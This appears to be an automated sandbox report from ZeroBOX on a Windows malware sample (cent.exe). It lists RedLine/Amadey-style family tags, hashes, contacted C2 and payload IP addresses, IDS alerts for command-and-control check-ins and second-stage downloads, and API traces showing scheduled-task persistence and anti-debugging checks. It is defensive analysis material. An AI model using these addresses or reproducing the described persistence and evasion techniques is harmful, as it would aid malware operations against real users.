popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

cent.exe

Ave Maria RedLine stealer Emotet Gen1 WARZONE RAT SmokeLoader RedLine Stealer Malicious Library Confuser .NET Malicious Packer UPX Admin Tool (Sysinternals etc ...) SMTP PWS CAB AntiDebug PE File PE32 AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Feb. 19, 2023, 2:01 p.m. Feb. 19, 2023, 2:04 p.m.
Size 973.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 72ae1bcbf0f8853939bbeb509fb02a06
SHA256 92d85c4a1ee5958a113f7d32c04fc9a4331f00cef182bb31e44d2240ca504e0c
CRC32 39E29D62
ssdeep 12288:XMroy90eUA2r18p9I4dL6FlhM7O1lzgyV7giL//wz3WWy3zlTBqSGwdC18LizXE:LyxsZ8pQvM7OIyYQ3xTBqSGwdu8GzXE
PDB Path wextract.pdb
Yara
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

Name Response Post-Analysis Lookup
transfer.sh
A 144.76.136.153
144.76.136.153
IP Address Status Action
144.76.136.153 Active Moloch
164.124.101.2 Active Moloch
176.113.115.17 Active Moloch
193.233.20.15 Active Moloch
193.233.20.16 Active Moloch
193.233.20.17 Active Moloch
45.32.218.145 Active Moloch
62.204.41.245 Active Moloch
62.204.41.88 Active Moloch
79.110.62.167 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49185 -> 193.233.20.16:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49190 -> 62.204.41.245:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 193.233.20.16:80 -> 192.168.56.103:49185 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 193.233.20.16:80 -> 192.168.56.103:49185 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 193.233.20.16:80 -> 192.168.56.103:49185 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49202 -> 79.110.62.167:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 79.110.62.167:80 -> 192.168.56.103:49202 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.110.62.167:80 -> 192.168.56.103:49202 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.110.62.167:80 -> 192.168.56.103:49202 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49217 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49217 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 144.76.136.153:443 -> 192.168.56.103:49218 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 144.76.136.153:443 -> 192.168.56.103:49222 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 193.233.20.15:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49221 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49221 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49221 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49206 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49206 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49206 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 144.76.136.153:443 -> 192.168.56.103:49207 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 193.233.20.15:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 193.233.20.15:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 193.233.20.15:80 -> 192.168.56.103:49184 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 193.233.20.15:80 -> 192.168.56.103:49184 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 193.233.20.15:80 -> 192.168.56.103:49184 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 8.8.8.8:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 8.8.8.8:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49205 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49205 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49205 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49216 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49216 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49216 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49220 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49220 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49220 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49220 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49205 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49221 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49206 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49217 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49216 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "mnolyk.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edb80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005edd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ee440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ee440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ee180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9b08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9b08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9b08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9b08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9b48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9b48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008f9d08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008fa308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008fa308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008fa188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d56f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d56f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d56f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d56f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5778
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5778
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d5938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d6078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008d6078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x8f3cac
0x8f3bce
0x8f24dd
0x8f20b6
0x8f05a0
0x8f006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8f3da0
registers.esp: 3338360
registers.edi: 3338412
registers.eax: 0
registers.ebp: 3338424
registers.edx: 6039888
registers.ebx: 3339316
registers.esi: 42005808
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x993df4
0x993d16
0x99248b
0x9920b6
0x9905a0
0x99006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x993ee8
registers.esp: 1830804
registers.edi: 1830856
registers.eax: 0
registers.ebp: 1830868
registers.edx: 9255696
registers.ebx: 1831724
registers.esi: 44770180
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xbb74ec
0xbb740e
0xbb24dd
0xbb20b6
0xbb05a0
0xbb006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72862652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7287264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72872e95
